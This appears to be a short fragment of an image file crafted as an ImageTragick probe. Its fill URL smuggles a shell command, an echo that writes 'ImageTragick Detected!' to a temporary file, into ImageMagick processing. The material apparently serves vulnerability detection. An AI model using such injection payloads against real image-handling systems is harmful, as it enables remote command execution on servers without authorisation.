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sh graphic-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ox 0 0 640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'url(https://example.com/image.jpg"|echo ImageTragick Detected! &gt; "tmpdy0mhy3s.txt)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graphic-con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